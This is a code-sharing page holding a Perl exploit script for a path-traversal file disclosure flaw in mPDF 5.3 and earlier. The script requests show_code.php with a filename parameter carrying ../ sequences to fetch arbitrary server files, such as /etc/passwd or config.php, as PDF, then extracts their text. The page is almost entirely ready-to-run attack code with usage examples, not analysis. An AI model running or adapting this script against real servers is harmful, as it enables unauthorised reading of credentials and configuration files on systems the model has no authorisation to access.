扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 |
# Exploit Title: mPDF <= 5.3 File Disclosure # Google Dork: Please no dork # Date: 16th December 2011 # Author: ZadYree # Software Link: http://www.mpdf1.com/mpdf/download # Version: 5.3 and prior # Tested on: Multiple # CVE : N/A #!/usr/bin/perl -U =head1 TITLE mPDF <= 5.3 File Disclosure Exploit (0day) =head2 SYNOPSIS -- examples/show_code.php -- preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI unproperly filtered. $num = intval($m[1]); $title = ucfirst(preg_replace('/_/',' ',$m[2])); if (!$num || !$title) { die("Invalid file"); } =head2 DESCRIPTION This vulnerability, due to a weak filter, lets you download any unprotected remote content, under PDF format. The exploit may not work, depending on the set up htaccess/chmod rules on the remote server. =head2 USAGE perl exploit.pl -r http://p00niez.com/mpdf53/ ../config.php perl exploit.pl -a http://p00niez.com/mpdf53/ /etc/passwd Requiered modules: PDF::OCR2 LWP::Simple File::Type Download a module: sudo cpan -fi install Module::Name =head3 Author Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog =head3 Thanks PHDays CTF - Yes, CTFs sometime do give you 0dayz 3LRVS Team - Support =cut #************* Configuration **************# my $pdf_file = '/tmp/b00m.pdf'; $PDF::OCR2::CHECK_PDF = 0; $del_temp_file = 1; #******************************************# use 5.010; use PDF::OCR2; use Getopt::Std; use LWP::Simple; use File::Type; use constant TRUE => 1; use constant FALSE => 0; help() unless (@ARGV >= 2); my (%optz, $uri); getopts('rah', \%optz); my $relative = $optz{'r'}; my $absolute = $optz{'a'}; my $help = $optz{'h'}; help() unless ($absolute || $relatife); my ($purl, $fpath) = @ARGV; my $name = $purl; $name =~ s{http://(.+?)/.*} {$1}; $name .= ("_" . localtime(time) . ".txt"); $uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute); $uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative); help() unless ($uri); my $furl = $purl . $uri . $fpath; $furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted. say "[*]Retrieving content..."; my $file = make_file(get($furl)); die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file); say "[+]OK\012[*]Converting format..."; $pdf = PDF::OCR2->new($file); my $text = $pdf->text; $text =~ s/[^\x0A-\x7F]+?//gm; open(my $fh, '>', $name); print $fh $text; close($fh); say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name; unlink($pdf_file) if ($del_temp_file == TRUE); sub make_file { my $content = shift; open($fh, '>', $pdf_file); print $fh $content; close($fh); return($pdf_file); } sub is_pdf { my $checked_file = shift; my $ft = File::Type->new(); return(1) if ($ft->mime_type($checked_file) eq "application/pdf"); return(0); } help() if ($help); sub help { say <<"EOF"; Usage: perl $0 [-r|-a] http://[mPDF URL] <file_to_read> Details: -r : Relative path (ex: ../file.php) -a : Absolute path (ex: /etc/file.zd) For any more information, feel free to contact ZadYree Happy hacking! EOF exit(0); } |
体验盒子
